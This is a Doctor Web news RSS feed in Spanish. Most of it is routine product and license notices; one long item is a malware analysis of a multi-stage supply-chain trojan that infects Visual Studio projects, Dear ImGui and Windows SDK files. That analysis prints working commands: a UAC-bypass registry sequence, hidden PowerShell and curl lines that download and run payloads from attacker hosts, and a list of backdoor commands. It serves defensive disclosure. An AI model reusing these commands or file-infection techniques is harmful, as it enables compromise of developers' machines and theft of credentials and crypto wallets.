<?xml version="1.0"?>
<rss version="2.0"><channel><title>Todas las noticias</title><link>https://news.dr-web.es/news/</link><description>Noticias de la empresa Doctor Web - Todas las noticias</description><image><url>https://st.drweb.com/static/drweb_logo_es.gif</url><link>https://news.dr-web.es/news/</link><title>Antivirus Dr.Web</title></image><item><guid>https://news.dr-web.es/show/?i=15291&amp;lng=es</guid><title>Actualización del servidor de control centralizado para Dr.Web Enterprise Security Suite y Dr.Web Industrial</title><link>https://news.dr-web.es/show/?i=15291&amp;lng=es&amp;c=5</link><pubDate>Thu, 23 Jul 2026 17:15:37 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;La empresa Doctor Web lanza una actualización para el servidor incluido en Dr.Web Enterprise Security Suite y Dr.Web Industrial, versión 13.0.1.202606110. La nueva versión estará disponible para su descarga el 27 de julio de 2026 a través de la interfaz web de la consola de control.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Novedades de la actualización&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Esta actualización tiene como objetivo principal mejorar la estabilidad del Centro de control y corregir varios errores detectados en la versión anterior. En concreto, se han solucionado problemas con la visualización de elementos secundarios al filtrar en el árbol de red del antivirus y se han corregido errores en el envío de notificaciones a los administradores y la generación de informes. La lista completa de cambios está disponible en &lt;a href="https://news.dr-web.es/changelog/?lng=es"&gt;Changelog&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Impacto en los agentes (incluido Dr.Web Industrial)&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;La actualización del servidor no afecta al funcionamiento de los agentes en los nodos protegidos. La actualización del componente del servidor no requiere reiniciar ni reconfigurar el software del agente; estos seguirán funcionando con normalidad. Para entornos industriales que utilizan Dr.Web Industrial, esto significa que no habrá cambios en el funcionamiento del agente, ya que todas las correcciones se aplican exclusivamente al servidor y a la interfaz de control.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Importante:&lt;/strong&gt; El Servidor Dr.Web se reiniciará automáticamente durante la instalación de la actualización. Recomendamos programar el procedimiento con antelación para las horas de menor actividad.&lt;/p&gt;&lt;p&gt;Les recordamos que las actualizaciones oportunas son fundamentales para mantener el nivel de protección requerido y el funcionamiento óptimo del software.&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15284&amp;lng=es</guid><title>Actualización del componente antispam en Dr.Web Enterprise Security Suite y en Dr.Web por suscripción</title><link>https://news.dr-web.es/show/?i=15284&amp;lng=es&amp;c=5</link><pubDate>Wed, 15 Jul 2026 17:04:45 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;La empresa Doctor Web lanza la actualización del módulo antispam 1.1.2.202604160 para Dr.Web Enterprise Security Suite y Dr.Web por suscripción. Estará disponible para su descarga a partir del 20 de julio de 2026. &amp;nbsp;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Este módulo escanea el tráfico de correo electrónico en tiempo real y analiza sus componentes: encabezados, cuerpo, hipervínculos y archivos adjuntos. El componente es eficaz y no afecta el rendimiento del cliente de correo electrónico.&lt;br&gt;La nueva versión incluye mejoras en la detección de spam y el análisis de enlaces, así como cambios internos. Anteriormente se lanzó una &lt;a href="https://news.dr-web.es/show/?i=14979&amp;amp;lng=es"&gt;actualización importante&lt;/a&gt; que aumentó la eficacia de la detección y el filtrado de tráfico no deseado.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Atención a los usuarios de Windows XP&lt;/strong&gt;: si tienen habilitada la opción de actualizar solo las bases de datos antivirus, el complemento de Dr.Web para Microsoft Outlook no funcionará correctamente: todos los correos electrónicos entrantes se detectarán como spam. Para comprobarlo, seleccionen «Actualizar» en la configuración del programa, luego hagan clic en «Configuración avanzada» y accedan a la sección «Componentes actualizados».&amp;nbsp;&lt;br&gt;Recomendamos a los usuarios de este sistema operativo que actualicen a una versión posterior o que habiliten las actualizaciones para todos los módulos del programa en la configuración, no solo para las bases de datos de virus.&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15285&amp;lng=es</guid><title>Actualizado el Acuerdo de Licencia del software Dr.Web</title><link>https://news.dr-web.es/show/?i=15285&amp;lng=es&amp;c=5</link><pubDate>Wed, 15 Jul 2026 14:43:47 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;La empresa Doctor Web ha actualizado el Acuerdo de Licencia del software Dr.Web. Puede consultar la nueva versión del documento en el siguiente enlac &lt;a href="https://license.drweb.com/agreement/."&gt;https://license.drweb.com/agreement/.&lt;/a&gt;&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Principales cambios:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;el texto se ha estructurado por secciones temáticas para facilitar la navegación;&lt;/li&gt;&lt;li&gt;se han incorporado definiciones de los términos con el fin de facilitar la comprensión del documento y evitar interpretaciones erróneas;&lt;/li&gt;&lt;li&gt;se ha precisado la diferencia entre el uso autorizado y el uso sin licencia del software Dr.Web;&lt;/li&gt;&lt;li&gt;se han añadido aclaraciones sobre las preguntas más frecuentes de los usuarios, como en qué dispositivos puede utilizarse la licencia adquirida, si es obligatorio que el dispositivo protegido sea de su propiedad y otras cuestiones similares.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Al seguir utilizando el software Dr.Web tras la entrada en vigor de la nueva versión del Acuerdo de Licencia, usted confirma que acepta íntegramente las nuevas condiciones. Si no está de acuerdo con los cambios, deberá eliminar el software Dr.Web de sus dispositivos.&lt;/p&gt;&lt;p&gt;Le recordamos que este documento es aplicable a todo el software de la familia Dr.Web, con excepción de Dr.Web FixIt! y Dr.Web vxCube, que cuentan con sus propios Acuerdos de Licencia.&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15276&amp;lng=es</guid><title>Objetivo: desarrolladores. Un nuevo troyano ataca la cadena de suministro y provoca daños combinados en los equipos infectados</title><link>https://news.dr-web.es/show/?i=15276&amp;lng=es&amp;c=5</link><pubDate>Fri, 10 Jul 2026 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Los expertos del laboratorio antivirus han analizado un nuevo programa troyano. Se trata de una amenaza del tipo supply chain attack (ataque a la cadena de suministro). Su principal característica es que se dirige a proyectos desarrollados en los lenguajes de programación C++ y C#. Otra de sus particularidades es su carácter especialmente peligroso. El troyano combina varios mecanismos de ataque y desempeña simultáneamente diversas funciones: stealer, clipper, backdoor, miner y fuente de infección de archivos.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Los primeros casos de propagación del troyano se detectaron durante el último trimestre de 2025 y, desde entonces, sus desarrolladores lo han modificado de forma continua. Se propaga principalmente por Internet mediante archivos .exe y Python infectados. El proceso de infección consta de varias etapas. A continuación, analizamos cada una de ellas y su finalidad.&lt;/p&gt;&lt;h3&gt;Etapa 1. Trojan.DownLoader49.35384&lt;/h3&gt;&lt;p&gt;Los expertos de Doctor Web detectaron múltiples aplicaciones legítimas infectadas con una estructura similar. Al archivo ejecutable original se le añade un objeto global y la ejecución de la aplicación troyanizada comienza obteniendo acceso a las API del sistema mediante el método PEB walking. A continuación, la función estándar initterm recorre la tabla de punteros a funciones e inicializa cada una de ellas. Una de esas funciones es maliciosa y ejecuta un comando de PowerShell. En algunas versiones del troyano, esta carga útil se almacena cifrada.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Ejecución mediante initterm&lt;/i&gt;&lt;/p&gt;&lt;p&gt;El comando de PowerShell descarga y ejecuta el archivo malicioso&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Trojan.DownLoader49.35687&amp;lng=es"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, lo que da comienzo a la segunda etapa de la infección.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Comando malicioso de PowerShell&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Además de los archivos ejecutables, se detectaron archivos escritos en Python (&lt;strong&gt;Python.Downloader.255&lt;/strong&gt;). En ellos, el mismo código malicioso estaba cifrado mediante el mecanismo de cifrado simétrico Fernet. El código se oculta mediante una sencilla técnica de ofuscación consistente en insertar una gran cantidad de espacios en la primera línea del archivo. En este caso, la ejecución también se desarrolla en varias etapas.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Archivos maliciosos en Python&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Etapa 2. Trojan.DownLoader49.35687&lt;/h3&gt;&lt;p&gt;En esta etapa, el troyano&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Trojan.DownLoader49.35687&amp;lng=es"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;comprueba si se está ejecutando en un entorno sandbox. Además, crea un objeto de sincronización mutex con el nombre Global\PFNMX (valor fijo). Un ejemplo de este tipo de objeto es: &lt;span class="string"&gt;\Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008&lt;/span&gt;. De este modo, el troyano verifica si ya existe otra copia en ejecución en el equipo.&lt;/p&gt;&lt;p&gt;Durante esta segunda etapa, el troyano intenta obtener las direcciones del servidor C2 a través de repositorios públicos de GitHub y de la plataforma de videojuegos Steam. En ellos, los atacantes publican los dominios que el troyano lee y utiliza como URL para descargar la tercera etapa de la infección: el troyano &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Las cuentas de Steam creadas por los atacantes contienen el nombre del dominio en texto plano.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/4_VIR-DevRunTime-220526-1613-12.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Cuenta de Steam con el dominio&lt;/i&gt;&lt;/p&gt;&lt;p&gt;En GitHub, los atacantes almacenaron la dirección cifrada del dominio C2 en un archivo raw: &lt;span class="string"&gt;raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine&lt;/span&gt;. El troyano descarga este archivo y lo descifra primero mediante Base64 y, posteriormente, aplicando una operación XOR con la clave ZwFlushKey.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/5_VIR-DevRunTime-220526-1613-12.pdf-image-008.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Dominios cifrados&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Tras descargar la siguiente etapa,&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Trojan.DownLoader49.35687&amp;lng=es"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;la inyecta en el proceso de uno de los 41 archivos ejecutables predefinidos ubicados en &lt;span class="string"&gt;C:\Windows\System32&lt;/span&gt;.&lt;/p&gt;&lt;p&gt;La dirección del dominio C2 con la que se ha logrado establecer conexión se añade a las cadenas integradas de forma fija en el código del troyano y se transmite a la siguiente etapa a través del canal con nombre pipe\VccFramework.&lt;/p&gt;&lt;h3&gt;Etapa 3. BackDoor.Siggen2.5906&lt;/h3&gt;&lt;p&gt;En esta etapa se lleva a cabo la actividad maliciosa principal. &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; crea un objeto de sincronización mutex con un nombre fijo del tipo Global\PFNX_Side(valor fijo). A continuación, a través del canal creado previamente, el troyano recibe los datos de la segunda etapa, de los que extrae los identificadores del troyano y el dominio C2 con el que se comunicará &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Para consolidarse en el sistema, el troyano descarga el archivo «bungee.boo» que realiza las funciones de la etapa 2 —&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Trojan.DownLoader49.35687&amp;lng=es"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, y suplanta con el mismo los archivos DLL:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;«profapi.dll» de la aplicación Discord,&lt;/li&gt;&lt;li&gt;«domain_actions.dll» en la carpeta «Domain Actions» y «well_known_domains.dll» en la carpeta «Well Known Domains» de la aplicación Microsoft Edge,&lt;/li&gt;&lt;li&gt;«C:\Windows\omadmapi.dll».&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Además, &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; puede modificar el Registro de Windows para que, al abrir archivos comprimidos con WinRAR, se ejecute código malicioso.&lt;/p&gt;&lt;p&gt;Para ejecutar acciones con privilegios de administrador, el troyano utiliza una técnica para esquivar el UAC (Control de cuentas de usuario). El malware genera un archivo .vbs con un nombre formado por una secuencia aleatoria de cifras, en el que inserta un comando que se ejecutará con privilegios de administrador. A continuación, ejecuta los siguientes comandos mediante cmd.exe:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A continuación, el troyano pone en funcionamiento cinco funciones maliciosas: un stealer, un clipper, un backdoor, un miner y un módulo de infección de archivos.&lt;/p&gt;&lt;h3&gt;Stealer&lt;/h3&gt;&lt;p&gt;El troyano puede robar información de varios tipos:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;tockens Discord que permiten iniciar sesión en cuentas ajenas sin introducir un nombre de usuario/contraseña;&lt;/li&gt;&lt;li&gt;contraseñas y cookies de navegadores Chrome, Edge, Opera, Brave, Yandex etc. Además de las técnicas ordinarias de extracción de datos, puede usar el archivo CCCWF.tmp (&lt;strong&gt;Trojan.PWS.Siggen5.33623&lt;/strong&gt;). El mismo se incrusta en el navegador y luego lee las contraseñas y las guarda en archivos de texto;&lt;/li&gt;&lt;li&gt;carpetas de Telegram Desktop;&lt;/li&gt;&lt;li&gt;carpetas del criptomonedero Exodus.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Además de robar las carpetas de Exodus, el troyano modifica el monedero de criptomonedas. Para ello, localiza el archivo app.asar y lo suplanta por una copia descargada desde la URL &lt;span class="string"&gt;balista[.]lol/Stb/PokerFace/RTApp[.]txt&lt;/span&gt; mediante curl. En la versión suplantada el archivo index.js (&lt;strong&gt;Trojan.Siggen32.44702&lt;/strong&gt;) contiene la función unlock() que, al ejecutarse, envía las frases mnemotécnicas del monedero al servidor de los atacantes.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/6_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-016.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Archivo suplantado index.js&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Clipper&lt;/h3&gt;&lt;p&gt;Se trata de una de las funciones más peligrosas del troyano. El malware supervisa de forma continua el portapapeles del usuario: busca datos de tarjetas bancarias y los envía al servidor de los atacantes. Además, sustituye las direcciones de los monederos de criptomonedas por otras fraudulentas, que obtiene del servidor C2.&lt;/p&gt;&lt;h3&gt;Backdoor&lt;/h3&gt;&lt;p&gt;La funcionalidad del troyano permite a los atacantes controlar de forma remota el equipo infectado mediante la ejecución de los siguientes comandos:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;exc&lt;/td&gt;&lt;td&gt;descargar un archivo de url mediante curl y ejecutarlo&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RVRS&lt;/td&gt;&lt;td&gt;iniciar Reverse Proxy&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;RUNCMD&lt;/td&gt;&lt;td&gt;Ejecutar un comando mediante cmd&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;GETFILE&lt;/td&gt;&lt;td&gt;Cargar el contenido de un archivo determinado al servidor de control&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;LISTDIR&lt;/td&gt;&lt;td&gt;Enviar una lista de archivos desde un directorio específico del equipo al servidor de control&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;TROLL&lt;/td&gt;&lt;td&gt;ejecutar un comando destinado a trolear al usuario. Entre las opciones disponibles se incluyen earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer etc.&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;h3&gt;Miner&lt;/h3&gt;&lt;p&gt;Mediante curl el troyano descarga desde el servidor y ejecuta el archivo &lt;span class="string"&gt;https://files[.]catbox[.]moe/lvh9j3[.]bin&lt;/span&gt;&amp;nbsp;— &lt;strong&gt;Trojan.Packed2.50953&lt;/strong&gt;. Su estructura y funcionamiento son similares a los de la segunda etapa, con la diferencia de que, en lugar de descargar e inyectar &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt; descarga e inyecta &lt;strong&gt;Trojan.BtcMine.3956&lt;/strong&gt;. Este miner solo se ejecuta tras un determinado periodo de inactividad del usuario. El malware utiliza las herramientas de código fuente abierto &lt;a href="https://github.com/xmrig/xmrig" target="_blank" rel="noopener"&gt;XMRig&lt;/a&gt;, &lt;a href="https://github.com/trexminer/T-Rex" target="_blank" rel="noopener"&gt;T-Rex&lt;/a&gt; y &lt;a href="https://github.com/todxx/teamredminer/releases" target="_blank" rel="noopener"&gt;TeamRedMiner&lt;/a&gt;.&lt;/p&gt;&lt;h3&gt;Infección de archivos&lt;/h3&gt;&lt;p&gt;La principal característica de este troyano es la infección de archivos y su posterior propagación autónoma. Lista de archivos infectados:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;imgui_impl_win32.cpp,&lt;/li&gt;&lt;li&gt;.suo,&lt;/li&gt;&lt;li&gt;.exe,&lt;/li&gt;&lt;li&gt;winnetwk.h (Windows SDK),&lt;/li&gt;&lt;li&gt;.vcxproj y .csproj.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Para identificar las rutas de los archivos que pueden infectarse, el troyano recorre las unidades de disco y ejecuta el siguiente comando. A continuación, se muestra un ejemplo para la unidad A://&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj &amp;gt; %ALLUSERSPROFILE%\ADat.bin3290.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Los atacantes confían en que los desarrolladores publiquen sus proyectos con código malicioso en repositorios públicos. De este modo, otros desarrolladores que compilen, generen o modifiquen esos proyectos infectarán automáticamente sus equipos a través de los archivos .suo, .vcxproj y .csproj, mientras que los usuarios finales podrán ejecutar archivos ejecutables infectados generados con herramientas de desarrollo comprometidas.&lt;/p&gt;&lt;h3&gt;Archivo imgui_impl_win32.cpp. Trojan.Loader.3129&lt;/h3&gt;&lt;p&gt;El archivo &lt;span class="string"&gt;imgui_impl_win32.cpp&lt;/span&gt;&amp;nbsp;— forma parte de la biblioteca conocida Dear ImGui y se encarga de la interfaz gráfica de usuario para aplicaciones desarrolladas en C++. El troyano inserta dos líneas de código en este archivo: la primera contiene la carga útil y la segunda la ejecuta.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/7_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una línea de código con carga útil&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/8_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una idea de código que ejecuta la carga útil&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Resultado — un comando&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
start /min cmd.exe /c powershell -WindowStyle Hidden -Command "&amp;amp; { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;De este modo, la biblioteca queda infectada y cualquier aplicación en C++ creada por el usuario contendrá código malicioso. Al propagar o subir este tipo de aplicaciones, la infección continuará propagándose.&lt;/p&gt;&lt;h3&gt;Archivos .suo. Trojan.Loader.3138&lt;/h3&gt;&lt;p&gt;Se trata de archivos utilizados por el entorno de desarrollo Microsoft Visual Studio, en los que se almacena la configuración del usuario para determinados proyectos. El troyano sustituye el archivo original por una versión infectada descargada desde el servidor C2.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/9_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-006.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Un archivo infectado&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Como resultado, al abrir un proyecto en Visual Studio se ejecuta el código malicioso:&lt;/p&gt;&lt;div class="grid"&gt;&lt;pre&gt;&lt;code class="language-plaintext"&gt;
javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" &amp;amp;&amp;amp; start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3&gt;Archivos winnetwk.h. Trojan.Loader.3184&lt;/h3&gt;&lt;p&gt;Windows SDK es el kit oficial de desarrollo de software (SDK) de Microsoft, que permite crear aplicaciones para el sistema operativo Windows.&lt;/p&gt;&lt;p&gt;El troyano consulta el Registro de Windows para localizar la carpeta donde está instalado Windows SDK. A continuación, busca el archivo &lt;span class="string"&gt;winnetwk.h&lt;/span&gt;, responsable de la administración de los recursos de red, e inserta en él código malicioso.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/10_VIR-DevRunTime-220526-1613-12.pdf-image-010.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Archivo infectado winnetwk.h&lt;/i&gt;&lt;/p&gt;&lt;p&gt;A partir de ese momento, todos los programas creados utilizando winnetwk.h incorporarán código malicioso que ejecutará la segunda etapa.&lt;/p&gt;&lt;h3&gt;Archivos .exe&lt;/h3&gt;&lt;p&gt;El troyano busca archivos .exe adecuados e inserta en ellos las funciones de inicialización de las API y de ejecución de initterm. A continuación, el archivo empieza a funcionar como&amp;nbsp;&lt;a href="https://vms.dr-web.es/search/?q=Trojan.DownLoader49.35384&amp;lng=es"&gt;&lt;b&gt;Trojan.DownLoader49.35384&lt;/b&gt;&lt;/a&gt;, es decir, como la etapa 1.&lt;/p&gt;&lt;h3&gt;Archivos .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) y .csproj (Trojan.Loader.3126)&lt;/h3&gt;&lt;p&gt;Se trata de archivos de proyecto de Visual Studio para los lenguajes de programación C++ y C#. El troyano añade a estos archivos un comando PreBuildEvent, que se ejecuta antes de cada compilación del proyecto. Las primeras versiones del troyano incorporaban un código similar al de etapa 1.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/11_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Versión inicial del código&lt;/i&gt;&lt;/p&gt;&lt;p&gt;En las versiones más recientes, el código es más complejo e incorpora mecanismos adicionales de ofuscación.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/12_VIR-Trojan.PWS.Steam.38782-220526-1614-18.pdf-image-014.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Nueva versión del código&lt;/i&gt;&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/13_Clipboard-28_мая_2026_г_15_07_16.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una etapa de ejecución de &lt;strong&gt;Trojan.Loader.3128&lt;/strong&gt;&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Como resultado de la ejecución del comando malicioso, se crea un archivo .vbs malicioso que, a su vez, ejecuta la carga útil de PowerShell. A continuación, el troyano envía solicitudes a las siguientes direcciones URL:&lt;/p&gt;&lt;ul class="list"&gt;&lt;li&gt;youtu.be/akoxddx6lgc,&lt;/li&gt;&lt;li&gt;steamcommunity.com/profiles/76561198737324192.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;En estas direcciones se almacena otra dirección URL cifrada mediante base64.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/july/trojan_downloader/14_VIR-DevRunTime-220526-1613-12.pdf-image-012.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Una cuenta de YouTube con una dirección URL 